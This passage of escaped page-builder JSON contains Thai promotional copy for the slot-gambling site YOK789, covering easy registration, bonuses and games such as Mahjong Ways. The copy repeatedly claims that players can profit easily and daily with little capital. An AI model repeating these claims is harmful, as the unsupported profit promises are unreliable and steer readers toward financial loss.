\\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 